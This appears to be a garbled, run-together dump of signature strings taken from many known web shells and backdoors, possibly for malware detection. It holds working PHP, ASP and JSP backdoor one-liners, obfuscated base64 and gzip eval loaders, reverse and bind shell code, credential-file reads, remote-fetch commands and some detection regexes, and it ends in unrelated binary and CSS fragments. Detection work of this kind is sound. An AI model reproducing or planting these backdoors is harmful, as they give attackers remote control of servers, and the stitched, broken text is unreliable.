mutex\x00unable to init mutex\x00invalid stream lock number\x00corrupt per-thread data\x00out of memory\x00unable to init threads\x00unable to init heap\x00qt5core.dll\x00\x00qtcore4.dll\x00`
directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' 
of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep 
::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? 
\"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? 
\"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int 
i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? 
urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? 
echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. 
command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win 
dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... 
a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! 
(maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. 
php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . 
\"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. 
we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? 
$cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? 
1 ()ljava/util/set;(ljava/lang/string;)vljava/lang/exception;oooy32too.javabbfwkdljava/lang/process;getparametersimio.javaljavax/swing/jlist;-(ljava/lang/string;)ljava/lang/stringbuilder;ljava/io/inputstream;vfnnnrof.exnnnroeolsnnfwgetpropertyjava/io/filenotfoundexceptionllolp;cjhgreshhnuf stackmaptableonfwwa(c)ljava/lang/stringbuilder;lesia$fffgss;<clinit>()ljava/io/inputstream;openconnection gjhgreshhnijhgreshhrtsjhgreshhot.sjhgreshhihjhgreshht;)oi.class rjhgreshhorjhgreshhre rajhgreshhvjava/net/urlcreated-by: 1.7.0-b147 (oracle corporation)close-mail{right:130px ccc;box-shadow:0 0 5px 1px 757575;border-bottom:1px solid 777;height:1.8em;line-height:1.9em;display:block;float:left;padding:1px 15px;margin:0;text-shadow:-1c4c4c4;}999;-webkit-box-shadow:0 0 3px header div.service-links ul{display:inline;margin:10px 0 0;}t div h2.title{padding:0;margin:0;}.box5-condition-news h2.pane-title{display:block;margin:0 0 9px;pfooter div.comp-info p{color:pcmi-listing-center .full-page-listing{width:490px;}pcmi-content-top .photo img,333;}div.tfw-header a var{display:inline-block;margin:0;line-height:20px;height:20px;width:120px;bacay:none;text-decoration:none;outline:none;padding:4px;text-align:center;font-size:9px;color:333;}body.page-videoplayer div373737;position:relative;}body.node-type-video divpcmi-content-sidebara,.page-error-page fff;text-decoration:none;}qtabs-list li a,cdn2.dailyrx.comer div.panel-hide{display:block;position:absolute;z-index:200;margin-top:-1.5em;}div.panel-pane div.ve.gif) right center no-repeat;}div.ctools-ajaxing{float:left;width:18px;background:url(http://cdn3.efefef;margin:5px 0 5px 0;}node{margin:0;padding:0;}div.panel-pane div.feed a{float:right;}:0 5px 0 0;float:left;}div.tweets-pulled-listing div.tweet-authorphoto img{max-height:40px;max-widthi a{color::bold;}div.tweets-pulled-listing .tweet-time a{color:silver;}div.tweets-pulled-listing div.tweet-didiv.panel-pane div.admin-links{font-size:xx-small;margin-right:1em;}div.panel-pane 
